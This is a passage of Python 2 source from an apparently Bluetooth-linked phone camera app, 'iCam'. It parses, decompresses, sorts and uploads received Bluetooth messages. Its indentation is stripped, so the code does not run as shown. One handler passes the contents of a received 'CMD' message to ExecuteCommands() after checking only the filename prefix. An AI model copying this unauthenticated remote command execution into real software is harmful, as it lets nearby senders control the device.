UploadUnsentBinaryData(btClientDeviceId, fileName, SMFData)
else:
#btMsgData[4:] is the SMF packet, compressed. stateMediaData is btMsgData[4:].decode("zlib")
UploadUnsentBinaryData(btClientDeviceId, fileName,
btMsgData[4:])
elif useiCamServer == 1:
"""
# We send ONLY THE STATE data from the Bluetooth message,
# to the iCam Server
stateData = stateMediaData[struct.calcsize(deviceIdFormat) : \
struct.calcsize(deviceIdFormat) + \
struct.calcsize(statePackFormat)]
"""
if NEW_BT_FORMAT:
fileName = fileName[ : -4] + EXTENSION_STATE_AND_MEDIA_FILE
stateData = stateMediaData[-lenNonMediaData : ]
else:
stateData = stateMediaData[0: lenNonMediaData]
stateDataCompressed = stateData.encode("zlib")
UploadUnsentBinaryData(btClientDeviceId, fileName,
stateDataCompressed)
# """
if uploadMediaToYouTube or uploadMediaToPicasa:
"""
Wait less if useiCamServer and size of packet
is big (e.g., 50-200KB).
"""
SleepAndPetWatchdog(pauseIntervalGdata)
# """
"""
fOutput = open(pathName + "/" + fileName, "wb")
fOutput.write(btMsgData[4 : ])
fOutput.close()
"""
"""
firstNullCharIndex = accessPointName.find("\x00")
accessPointName = accessPointName[0 : firstNullCharIndex]
#print "len(fileName) =", len(fileName)
accessPointName = unicode(accessPointName)
"""
# appuifw.note(u"Wrote received file %s." % fileName, "info")
# bluetoothServerTimer.after(1, \
# BluetoothMessageListProcessWrapper(bluetoothFD))
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
"""
!!!!If we receive "SymbianError: [Errno -14] KErrInUse"
(see http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stderr_2011_06_13_10_02_41.txt)
try to Quit() or restart phone
"""
except:
DebugPrintErrorTrace()
def BluetoothMessageProcessCMD(btMsgId, btMsgData, aData,
fileNameBtMsg, btClientDeviceId):
DebugPrint("Entered BluetoothMessageProcessCMD(btMsgId=%s, btMsgData of " \
"len %d, aData of len %d, fileNameBtMsg=%s, btClientDeviceId=%s." % \
(btMsgId, len(btMsgData), len(aData), fileNameBtMsg, btClientDeviceId))
"""
Delete before ExecuteCommands() because we might execute a
RestartPhone().
"""
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
"""
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) +
len(BT_OBEX_FILENAME_PREFIX_TYPE_TXT) :] +
EXTENSION_TEXT_MESSAGE
"""
"""
If it's not a BT client (i.e., it is a BT server or
a standard node connected to Inet) it doesn't make that
much sense normally to receive BT messages.
But at least for testing purposes we allow also the BT server
to process BT CMD messages.
"""
# BT client
if (bluetoothMode == 2) or (bluetoothMode == 1):
if NEW_BT_FORMAT:
cmdString = aData[struct.calcsize(deviceIdFormat): ]
#cmdString = aData
"""
# If ever planning to send this file to the Inet server (why?) do:
fileName = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): \
-len(BT_OBEX_EXTENSION_CMD)] + \
EXTENSION_COMMAND_MESSAGE
"""
else:
cmdString = aData[struct.calcsize(deviceIdFormat): ]
"""
DebugPrint("BluetoothMessageProcessCMD(): cmdString = %s" % cmdString)
"""
# We create a backup file of the commands received.
fileName = COMMANDS_FILENAME + \
GetCurrentDateTimeStringWithMilliseconds()
fOutput = open(LOCAL_FOLDER + "/" + fileName, "wb")
fOutput.write(cmdString)
fOutput.close()
ExecuteCommands(cmdString)
if not (SYMBIAN_S60_OS and (_PyS60_1_9_OR_NEWER == False)):
# Python 2.2 doesn't have the pickle module
try:
import pickle
except:
DebugPrintErrorTrace()
#if SYMBIAN_OS:
#BT_MAP_FILENAME = LOCAL_FOLDER_TEMP + "/BT_map.pkl"
BT_MAP_FILENAME = LOCAL_FOLDER + "/BT_map.pkl"
def LoadBtMsgMostRecentTime():
global btMsgMostRecentTime, btAddrTable
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER == False:
"""
Python 2.2 doesn't have the pickle module.
Anyhow we hope not to use it for iCam BT server.
"""
return
fInput = None
try:
if os.path.isfile(BT_MAP_FILENAME):
# Inspired from second example at
# http://docs.python.org/library/pickle.html at 11.1.7:
fInput = open(BT_MAP_FILENAME, "rb")
btMsgMostRecentTime = pickle.load(fInput)
btAddrTable = pickle.load(fInput)
fInput.close()
DebugPrint("LoadBtMsgMostRecentTime(): btMsgMostRecentTime = %s, " \
"btAddrTable = %s" % \
(str(btMsgMostRecentTime), str(btAddrTable)))
except:
try:
if fInput is not None:
fInput.close()
except:
DebugPrintErrorTrace()
DebugPrintErrorTrace()
def StoreBtMsgMostRecentTime():
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER == False:
"""
Python 2.2 doesn't have the pickle module.
Anyhow we hope not to use it for iCam BT server.
"""
return
fOutput = None
try:
# Inspired from first example at
# http://docs.python.org/library/pickle.html at 11.1.7:
fOutput = open(BT_MAP_FILENAME, "wb")
# Pickle using protocol 0.
pickle.dump(btMsgMostRecentTime, fOutput)
pickle.dump(btAddrTable, fOutput)
fOutput.close()
except:
try:
if fOutput is not None:
fOutput.close()
except:
DebugPrintErrorTrace()
DebugPrintErrorTrace()
"""
Dictionary with key (deviceId, cameraId) and
value media time (time.mktime() or tuple, depending on the OS).
"""
btMsgMostRecentTime = {}
"""
Dictionary holding for a BT server iCam phone
the key deviceId and value Bluetooth MAC address of all BT clients.
"""
btAddrTable = {}
"""
btMsgId is:
- for ANDROID_OS, WINDOWS_OS and SYMBIAN_3: a string representing the (filename) name of the BT msg
- for other SYMBIAN_OS: an integer ID for the messages from the BT Inbox.
"""
def BluetoothMessageProcessAndDelete(btMsgId, deleteMessageIfInvalid=False):
global bluetoothInbox
global statePackFormat
global btMsgList
if ANDROID_OS or WINDOWS_OS or RASPBIAN_OS:
"""
fIndex = btMsgId.rfind("/") #!!!!maybe \
fileNameBtMsg = btMsgId[fIndex + 1:]
pathFileNameBluetoothMessage = btMsgId
"""
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
pathFileNameBluetoothMessage = GetBluetoothMessagePathFileName(btMsgId)
sizeBluetoothMessage = os.path.getsize(pathFileNameBluetoothMessage)
timeBluetoothMessage = GetTime()
btMsgArrivalTime = -1
elif SYMBIAN_OS:
fileNameBtMsg = ""
sizeBluetoothMessage = -1
try:
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
if SYMBIAN_3:
#fileNameBtMsg = str(btMsgId)
sizeBluetoothMessage = os.path.getsize( \
GetBluetoothMessagePathFileName(btMsgId))
else:
if S60_EDITION[0] >= 3:
try:
sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
except:
DebugPrintErrorTrace()
#!!!!TODO check specifically for "SymbianError: [Errno -20] KErrCorrupt" and only then do BluetoothDeleteMessage
BluetoothDeleteMessage(btMsgId, True)
return -1
# Get message time of arrival.
btMsgArrivalTime = bluetoothInbox.time(btMsgId)
except:
DebugPrintErrorTrace()
myText = "Entered BluetoothMessageProcessAndDelete(btMsgId = %s) on %s " \
"(fileNameBtMsg = %s, " \
"sizeBluetoothMessage = %d, btMsgArrivalTime = %s). " \
"(Inbox has %d Bluetooth messages.)" % \
(str(btMsgId), GetCurrentDateTimeStringNice(),
fileNameBtMsg, sizeBluetoothMessage,
str(btMsgArrivalTime),
len(GetBluetoothInboxMessageList()))
DebugPrint(myText)
try:
btMsgArrivalTimeStruct = time.localtime(btMsgArrivalTime)
DebugPrint(
" BluetoothMessageProcessAndDelete(): btMsgArrivalTimeStruct = " + \
time.strftime("%Y_%m_%d_%H_%M_%S", btMsgArrivalTimeStruct))
except:
DebugPrintErrorTrace()
###########################################################################
###########################################################################
##########Now we have set fileNameBtMsg and sizeBluetoothMessage###########
###########################################################################
###########################################################################
#!!!!TODO: Alex
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
"""
"""
print("message %s" % str(btMsgId))
if bluetoothInbox.unread(btMsgId):
print "unread"
else:
print "read"
print("message type is %x" % bluetoothInbox.message_type(btMsgId))
"""
try:
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"fileNameBtMsg = %s." % fileNameBtMsg)
# Check that the BT message is sent by an iCam client.
if not fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"fileNameBtMsg = %s does not start " \
"with %s, so we consider it not being an " \
"iCam BT message. Bailing out without " \
"processing or erasing the message..." % \
(fileNameBtMsg, BT_OBEX_FILENAME_PREFIX))
return -1
# sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
#btMsgData = BluetoothMessageReadData(bluetoothInbox, btMsgId)
btMsgData = BluetoothMessageReadData(btMsgId)
if btMsgData is None:
#!!!!TODO check specifically for "SymbianError: [Errno -20] KErrCorrupt" and only then do BluetoothDeleteMessage
BluetoothDeleteMessage(btMsgId, True)
return -1
except:
#print("size is %d" % sizeBluetoothMessage)
#print(repr(BluetoothMessageReadData(bluetoothInbox, btMsgId)))
DebugPrintErrorTrace()
BluetoothDeleteMessage(btMsgId, True)
return -1
###########################################################################
###########################################################################
#####Now we have read entirely the Bluetooth message in btMsgData##########
###########################################################################
###########################################################################
# Checking integrity of the BT msg received and reading vars from header.
try:
#if btMsgData == "":
if len(btMsgData) < 4 + 1:
DebugPrint("BluetoothMessageProcessAndDelete(): len(btMsgData) = %d. " \
"Too small, so we consider it invalid and delete " \
"the message. Bailing out..." % len(btMsgData))
"""
if deleteMessageIfInvalid:
#bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
"""
BluetoothDeleteMessage(btMsgId, True)
return -1
if NEW_BT_FORMAT == False:
####################################################################
####################################################################
####Now we check the first word of btMsgData == fileDataSize####
####################################################################
####################################################################
# !!!!Be careful at endianess.
# fileDataSize = int(bluetoothFD.read(4))
"""
IMPORTANT: We require < to specify little endian and ALSO no
alignment (see http://docs.python.org/library/struct.html).
"""
(fileDataSize, ) = struct.unpack("<i", btMsgData[0 : 4])
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"fileDataSize=%s." % fileDataSize)
if len(btMsgData) - 4 != fileDataSize:
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"len(btMsgData) - 4 != fileDataSize. " \
"So, it appears this Bluetooth message was " \
"not sent by an iCam Bluetooth client. " \
"len(btMsgData) = %d, fileDataSize = %d. " \
"Bailing out..." % (len(btMsgData), fileDataSize))
"""
We delete it (or store it in an Error folder, if BT messages are
DIRECTLY accessible via the FS (Symbian 3+, Android)
"""
BluetoothDeleteMessage(btMsgId, True)
return -1
"""
NOTE THAT THE CHECK WE DO IS NOT RELIABLE
It seems the magic byte 0x78 is always there
- when using zlib.compressobj(1).compress() we have 0x78 0x01
- when using encode("zlib") we have 0x78 0x9C
# Check for Gzip stream header.
if not (btMsgData[4] == 0x78 and stateMediaData[
btMsgData[5] == 0x9C):
return
"""
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"len(btMsgData) = %d" % len(btMsgData))
#######################################################################
###Unzipping, unpacking the deviceId and creating the corresponding####
### Unsent folder for the deviceId.###################################
#######################################################################
"""
if fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : \
len(BT_OBEX_FILENAME_PREFIX) + \
len(BT_OBEX_FILENAME_PREFIX_TYPE_FIL)] == \
BT_OBEX_FILENAME_PREFIX_TYPE_FIL:
"""
if (NEW_BT_FORMAT and
fileNameBtMsg.endswith(EXTENSION_ARBITRARY_FILE)) or \
(not NEW_BT_FORMAT and \
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : ].\
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_TXT)):
# Arbitrary file (Not SMF, nor CMD, nor TXT)
"""
It is very possible that the uncompressed data can be huge so we
use zlib.decompressobj to partially decompress.
"""
zlibDecompressObject = zlib.decompressobj()
if NEW_BT_FORMAT:
stateMediaDataCompressed = btMsgData
else:
stateMediaDataCompressed = btMsgData[4:]
# See http://docs.python.org/library/zlib.html .
stateMediaData = zlibDecompressObject.decompress(
stateMediaDataCompressed,
struct.calcsize(statePackFormat) + 1000)
"""
# Maybe a few times with max_length = 8 * 1024
stateMediaData += zlibDecompressObject.decompress(
zlibDecompressObject.unconsumed_tail)
stateMediaData += zlibDecompressObject.flush()
"""
# Treat well!!!! - put in outter block
if NEW_BT_FORMAT:
#!!!!
pass
# !!!!TODO if suffix _icam.jpg then don't need to decode
# elif ():
else:
if NEW_BT_FORMAT:
stateMediaData = btMsgData
else:
"""
This treats SMF, CMD, and TXT.
Note that for CMD and SMF the uncompressed data is roughly the
same size as the compressed one.
"""
# stateMediaData = btMsgData[4 : ].decode("zlib")
stateMediaData = btMsgData[4:].decode("zlib")
###########################################################################
###########################################################################
##Now we have in stateMediaData the state data and file data (if required)##
###########################################################################
###########################################################################
if NEW_BT_FORMAT:
# This assumes the deviceId has 15 chars
#btClientDeviceId = fileNameBtMsg[-21:-6]
btClientDeviceId = fileNameBtMsg.split("_")[-2]
else:
"""
IMPORTANT NOTE: we use "<" to specify no alignment -
see http://docs.python.org/library/struct.html
"""
(btClientDeviceId, ) = struct.unpack(deviceIdFormat,
stateMediaData[0 : struct.calcsize(deviceIdFormat)])
firstNullCharIndex = btClientDeviceId.find("\x00")
btClientDeviceId = btClientDeviceId[0 : firstNullCharIndex]
"""
pathName = LOCAL_FOLDER_UNSENT_FILES + "/" + btClientDeviceId
if not os.path.exists(pathName):
os.makedirs(pathName)
"""
DebugPrint("BluetoothMessageProcessAndDelete(): " \
"btClientDeviceId = %s." % btClientDeviceId)
#DebugPrint("len(fileName) = %d" % len(fileName))
except:
try:
if deleteMessageIfInvalid:
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId, True)
except:
DebugPrintErrorTrace()
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = "Exception in BluetoothMessageProcessAndDelete() with btMsgId = %s" \
" - details: free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s. Bailing out..." % \
(str(btMsgId), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint("Exception in BluetoothMessageProcessAndDelete() " \
"with btMsgId = %s. Bailing out..." % str(btMsgId))
DebugPrintErrorTrace()
return -1
###########################################################################
###########################################################################
######Now, depending on file type, we process and delete the message.######
###########################################################################
###########################################################################
# The order of processing is somewhat relevant - we have CMD BT messages
# with extension .cmd.txt and TXT BT messages with .txt extension, so we
# look first for CMD BT and then TXT BT messages.
try:
# If the message is CMD:
#if (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
# in BT_OBEX_EXTENSION_LIST_CMD) or \
if (NEW_BT_FORMAT and
str.lower(fileNameBtMsg).endswith(BT_OBEX_EXTENSION_CMD)) or \
(not NEW_BT_FORMAT and
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_CMD)):
BluetoothMessageProcessCMD(btMsgId, btMsgData, stateMediaData,
fileNameBtMsg, btClientDeviceId)
elif str.lower(fileNameBtMsg).endswith(BT_OBEX_EXTENSION_TIM):
BluetoothMessageProcessTIM(btMsgId)
# If the message is TXT:
elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
in BT_OBEX_EXTENSION_LIST_TXT) or \
(not NEW_BT_FORMAT and
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_TXT)):
BluetoothMessageProcessTXT(btMsgId, btMsgData,
fileNameBtMsg, btClientDeviceId)
# If the message is FIL (contains an arbitrary file):
elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
in BT_OBEX_EXTENSION_LIST_FIL) or \
(not NEW_BT_FORMAT and
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_FIL)):
BluetoothMessageProcessFIL(btMsgId, btMsgData,
fileNameBtMsg, btClientDeviceId)
# If the message is SMF (contains state and media file):
#elif str.lower(fileNameBtMsg[len(fileNameBtMsg)
# - 4:]) in [".jpg", ".png", ".3gp", ".mp4"]:
elif (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
in BT_OBEX_EXTENSION_LIST_SMF) or \
(not NEW_BT_FORMAT and
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_SMF)):
res = GetInfoFromSMFBtMsg(stateMediaData, fileNameBtMsg)
DebugPrint(
"BluetoothMessageProcessAndDelete(): res = %s." % (str(res)))
if res is None:
return -1
cameraId = res[0]
(tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec, numMilliseconds) = res[1]
#!!!!TODO: check CRC in state of BT iCam message - can be put in state
"""
We check the validity of the date returned, since we had once
errors in the BT message (either uSD card or radio error) - see
Z:\1PhD\ReVival\Logs\NokiaN82\2013_11_17\stdout_2013_11_09_15_51_19.txt
"GetInfoFromSMFBtMsg(): cameraId = 0,
tm_year = 253733044, tm_mon = -1312688652, tm_mday = 1,
tm_hour = 54, tm_min = -120, tm_sec=-120,
numMilliseconds=736101691, btMsgStateTime = 1366848153 ."
"""
if (tm_year > 1900 and tm_year < 2200) and \
(tm_mon > 0 and tm_mon <= 12) and \
(tm_mday > 0 and tm_mday <= 31) and \
(tm_hour >= 0 and tm_hour < 24) and \
(tm_min >= 0 and tm_min < 60) and \
(tm_sec >= 0 and tm_sec < 60) and \
(numMilliseconds >= 0 and numMilliseconds < 1000):
pass
else:
return -1
#def RemoveOldBluetoothMessages():
"""
VERY IMPORTANT:
We filter videos: the old ones w.r.t. the new ones already sent.
The video recentness info is kept as <deviceId, crtCameraId>
in btMsgMostRecentTime.
We persist btMsgMostRecentTime on disk.
The old videos are deleted.
Note that only when the newly uploaded videos are uploaded to
YouTube, there is a pauseIntervalGdata pause to wait.
"""
global btMsgMostRecentTime, btAddrTable
btAddrTable[btClientDeviceId] = res[2]
"""
# Unfortunately time.mktime() DOES NOT WORK ON
# PyS60 2.0. It simply crashes it without an
# exception...
#From http://www.tutorialspoint.com/python/time_mktime.htm
"""
if SYMBIAN_OS:
crtVideoTime = (tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec)
else:
crtVideoTime = time.mktime( (tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec,
0, -1, -1) )
updatedBtMsgMostRecentTime = False
crtDevCam = (btClientDeviceId, cameraId)
if crtDevCam not in btMsgMostRecentTime:
btMsgMostRecentTime[crtDevCam] = crtVideoTime
updatedBtMsgMostRecentTime = True
else:
DebugPrint("btMsgMostRecentTime[crtDevCam] = %s" % \
str(btMsgMostRecentTime[crtDevCam]))
if btMsgMostRecentTime[crtDevCam] >= crtVideoTime:
#The crt video to upload to YT is older than the last uploaded.
DebugPrint("BluetoothMessageProcessAndDelete(): The " \
"current BT file (with crtVideoTime=%s) is " \
"older than the last processed one " \
"(with btMsgMostRecentTime[crtDevCam] = %s)." % \
(str(crtVideoTime), \
str(btMsgMostRecentTime[crtDevCam])))
BluetoothDeleteMessage(btMsgId)
return 0 # should it be -1? !!!!
else:
btMsgMostRecentTime[crtDevCam] = crtVideoTime
updatedBtMsgMostRecentTime = True
if (bluetoothMode == 1) and (updatedBtMsgMostRecentTime == True):
# BT server and updated btMsgMostRecentTime
StoreBtMsgMostRecentTime()
aBatteryLevel = -1
aChargerStatus = -1
try:
aBatteryLevel = res[3]
aChargerStatus = res[4]
except:
DebugPrintErrorTrace()
"""
IMPORTANT: GetInfoFromSMFBtMsg() needs to be called before to
update btMsgStateTime.
BluetoothTimeSyncWithDrift() checks if BT message arrival time and
btMsgStateTime are very different then send time-sync
adjustment command BT msg.
Note that BluetoothTimeSyncWithDrift() is better to be called
before BluetoothMessageProcessSMF(), which deletes the BT msg
at the end.
IMPORTANT NOTE: BluetoothMessageProcessSMF() deletes the BT msg
at the end, by calling BluetoothDeleteMessage().
"""
BluetoothTimeSyncWithDrift(btClientDeviceId, \
sizeBluetoothMessage, btMsgId)
BluetoothMessageProcessSMF(btMsgId, btMsgData, stateMediaData,
fileNameBtMsg, btClientDeviceId,
aBatteryLevel, aChargerStatus)
else:
"""
The message altough has iCam prefix name, does NOT have the
right extension.
"""
#if deleteMessageIfInvalid:
BluetoothDeleteMessage(btMsgId, True)
return -1
return 0
except:
DebugPrintErrorTrace()
return -1
btMsgList = None
"""
Returns the list of BT message filenames (WITHOUT path),
in ~chronological order.
"""
def GetInboxFolderList():
btInboxFolder = BLUETOOTH_INBOX_PATH
"""
On Symbian^3 devices, the received BT messages are no longer stored in
Messaging, but in the "E:\Received files" folder.
So len(btMsgList) = 0.
"""
btInboxFolderContent = os.listdir(btInboxFolder)
"""
Sort BT messages in lexicographic order, which corresponds to
chronological order
"""
#btInboxFolderContent.sort(reverse=False)
#btInboxFolderContent.sort()
# Sort BT messages in reverse lexicographic order, which corresponds to
btInboxFolderContent.sort(reverse=True)
# sortedBTInboxFolderContent = sorted(btInboxFolderContent)
"""
sort() without parameters is the ONLY one that works in
Python 2.2. (Info on sort at
http://wiki.python.org/moin/HowTo/Sorting/.)
"""
# #btInboxFolderContent.sort()
# #sortedBTInboxFolderContent = btInboxFolderContent
# print "sortedMediaFolderContent =", sortedMediaFolderContent
"""
DebugPrint("GetInboxFolderList(): btInboxFolderContent = %s" % \
str(btInboxFolderContent))
"""
res = []
# sortedBTInboxFolderContent
for btFileName in btInboxFolderContent:
#!!!!We should maybe discard the TXT and CMD files!!!! - they are sorted first after these!!!!
if btFileName.startswith(BT_OBEX_FILENAME_PREFIX):
# NOT NEEDED: pathFileName = btInboxFolder + "/" + btFileName
"""
if SYMBIAN_OS:
pathFileName = btInboxFolder + "\\" + btFileName
else:
pathFileName = btInboxFolder + "/" + btFileName
"""
"""
EXTENSION_3GP = ".3gp"
if os.path.isfile(pathFileName) and \
#str.lower(pathFileName).endswith(EXTENSION_3GP):
str.lower(pathFileName).endswith(
fileNameBtMsg[0: len(BT_OBEX_FILENAME_PREFIX)]):
"""
res.append(btFileName)
#res.append(pathFileName)
# !!!!CHANGED
DebugPrint("GetInboxFolderList(): res = %s" % \
str(res))
return res
"""
Returns the list of BT messages, in ~chronological order.
"""
def GetBluetoothInboxMessageList():
global btMsgList
DebugPrint("Entered GetBluetoothInboxMessageList().")
if ANDROID_OS:
res = GetInboxFolderList()
elif RASPBIAN_OS:
res = GetInboxFolderList()
elif WINDOWS_OS:
res = GetInboxFolderList()
elif SYMBIAN_OS:
if SYMBIAN_3:
res = GetInboxFolderList()
else:
"""
The BT message IDs are increasing with an increment of 2.
Normally (but I have seen exceptions - see
http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/log.html,
on May 2nd, 2011 at 3:35AM),
btMsgList has the elements sorted decreasingly following the
msg ID.
"""
"""
0x10009ED5 is the constant used in Symbian to specify only the
Bluetooth messages from Inbox - we create a CInboxAdapter that
reads only BT messages (it appears that the infrastructure is
the same for SMS, MMS, etc).
This value must not be changed.
For message types see -
http://discussion.forum.nokia.com/forum/showthread.php?17779-message-type-SMS-MMS-EMail..-etc .
"""
res = bluetoothInbox.list_messages(0x10009ED5)
if False:
"""
!!!!Obtaining time from all messages, since we cannot really
rely on the reverse chronological order returned by
list_messages().
"""
try:
btMsgList = res
DebugPrint("len(btMsgList) = %d" % len(btMsgList))
for btMsgId in btMsgList:
try:
"""
description(btMsgId) returns the name of the file from the
BT message.
"""
#!!!!TODO: make sure it's OK- Should be OK, since it's OK in BluetoothMessageProcessAndDelete()
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
# Get message time of arrival.
btMsgArrivalTime = bluetoothInbox.time(btMsgId)
DebugPrint(
"GetBluetoothInboxMessageList(): " \
"btMsgId = %s, fileNameBtMsg = %s, " \
"btMsgArrivalTime = %d" % \
(str(btMsgId), fileNameBtMsg,
btMsgArrivalTime))
try:
btMsgArrivalTimeStruct = \
time.localtime(btMsgArrivalTime)
DebugPrint(" " + \
time.strftime("%Y_%m_%d_%H_%M_%S", \
btMsgArrivalTimeStruct))
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
DebugPrint("GetBluetoothInboxMessageList(): len(res) = %d" % len(res))
return res
def BluetoothMessageListProcess(deleteMessageIfInvalid=False, \
deleteAllBTMessages=False, \
processJustNonSMF_BtMsgs=False):
global btMsgList, bluetoothInbox, conserveEnergy, \
uploadHowManyOfLatestBluetoothMessages
if conserveEnergy:
if MY_DEBUG_STDOUT:
print "BluetoothMessageListProcess(): bailing out because " \
"conserveEnergy = True."
if conserveEnergy == False:
sys.stdout.flush()
return
DebugPrint("Entered BluetoothMessageListProcess().")
if ANDROID_OS or RASPBIAN_OS:
try:
btInboxFolderContent = GetInboxFolderList()
if len(btInboxFolderContent) == 0:
return
# Process all the SMF BT messages.
counterBluetoothMessages = 0
if uploadHowManyOfLatestBluetoothMessages == -1:
"""
This order ensures the messages are sent on the server exactly
in the order they were received via Bluetooth (which
should be chronological order)
"""
rangeBtInboxFolderContent = range(len(btInboxFolderContent) - 1,
-1, -1)
elif uploadHowManyOfLatestBluetoothMessages > 0:
lenFolder = len(btInboxFolderContent)
howMany = min(lenFolder,
uploadHowManyOfLatestBluetoothMessages)
"""
for index in range(howMany):
BluetoothMessageProcessAndDelete(btInboxFolderContent[index],
deleteMessageIfInvalid)
"""
for index in range(howMany):
"""
We send the most recent BT message received - and then
check for most recent again immediately afterwards.
"""
BluetoothMessageProcessAndDelete(btInboxFolderContent[0],
deleteMessageIfInvalid)
"""
We check if a new BT message has appeared -
BluetoothMessageProcessAndDelete() can take long to
finish, especially because it uploads to Internet.
"""
btInboxFolderContent = GetInboxFolderList()
if len(btInboxFolderContent) == 0:
"""
We do this return because we access otherwise
btInboxFolderContent[0]
"""
return
return
"""
if uploadHowManyOfLatestBluetoothMessages >= \
len(btInboxFolderContent):
rangeBtInboxFolderContent = \
range(len(btInboxFolderContent))
else:
rangeBtInboxFolderContent = \
range(uploadHowManyOfLatestBluetoothMessages)
"""
else:
rangeBtInboxFolderContent = []
for i in rangeBtInboxFolderContent:
BluetoothMessageProcessAndDelete(btInboxFolderContent[i],
deleteMessageIfInvalid)
if (counterBluetoothMessages %
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
hasDownloadedNewCmd = DownloadCommands()
counterBluetoothMessages += 1
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS or WINDOWS_OS:
"""
if _PyS60_1_9_OR_NEWER:
#The pyinbox module not supported in PyS60 1.9+
return
"""
try:
btMsgList = GetBluetoothInboxMessageList()
"""
# TODO!!!!Think if keep this - maybe should take it out or maybe put it in BluetoothMessageProcessAndDelete(doNotProcSMF=True)
Process all CMD, TEXT and FILE (but not SMF - since they
~basically carry media) BT messages.
Treat them in chronological order.
"""
rangeBtMsgList = range(len(btMsgList) - 1, -1, -1)
# Treat them in reverse chronological order (most recent ones first).
for i in rangeBtMsgList:
#for btMsgId in btMsgList:
btMsgId = btMsgList[i]
try:
"""
description(btMsgId) returns the name of the file from the
BT message.
"""
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
# Checking if it is iCam BT message:
if fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
# Looking for iCam BT message that are not of SMF type.
if (NEW_BT_FORMAT and str.lower(fileNameBtMsg[-4:])
not in BT_OBEX_EXTENSION_LIST_SMF) or \
(not NEW_BT_FORMAT and
fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX): ]. \
startswith(BT_OBEX_FILENAME_PREFIX_TYPE_SMF)):
BluetoothMessageProcessAndDelete(btMsgId,
deleteMessageIfInvalid)
except:
DebugPrintErrorTrace()
if processJustNonSMF_BtMsgs == True:
return
#TODO!!!! END - see above
"""
We delete all iCam BT messages received if
deleteAllBTMessages == True.
This means we erase the SMF BT messages without
processing them.!!!!
"""
if deleteAllBTMessages:
"""
Once it crashed probably here, probably because len(btMsgList) ~= 1800
Therefore, if btMsgList is too big, we make it smaller.
"""
if len(btMsgList) > 300:
btMsgList = btMsgList[0: 300]
for btMsgId in btMsgList:
try:
"""
description(btMsgId) returns the name of the file
from the BT message.
"""
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
# sizeBluetoothMessage = bluetoothInbox.size(btMsgId)
# This is iCam BT message
if fileNameBtMsg.startswith(BT_OBEX_FILENAME_PREFIX):
# bluetoothInbox.delete(btMsgId)
BluetoothDeleteMessage(btMsgId)
except:
DebugPrintErrorTrace()
if MY_DEBUG_UPLOAD_MSG:
myText = "BluetoothMessageListProcess(): " \
"Exception around " \
"BluetoothDeleteMessage(%s)." % str(btMsgId)
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
return
# Now we process the SMF BT messages.
"""
In case we deleted messages in the previous lines, we read the
updated bluetoothInbox.list_messages() .
"""
btMsgList = GetBluetoothInboxMessageList()
counterBluetoothMessages = 0
if uploadHowManyOfLatestBluetoothMessages == -1:
"""
This order ensures the messages are sent on the server exactly
in the order they were received via Bluetooth (which should
be chronological order).
"""
rangeBtMsgList = range(len(btMsgList) - 1, -1, -1)
for i in rangeBtMsgList:
BluetoothMessageProcessAndDelete(btMsgList[i],
deleteMessageIfInvalid)
if (counterBluetoothMessages %
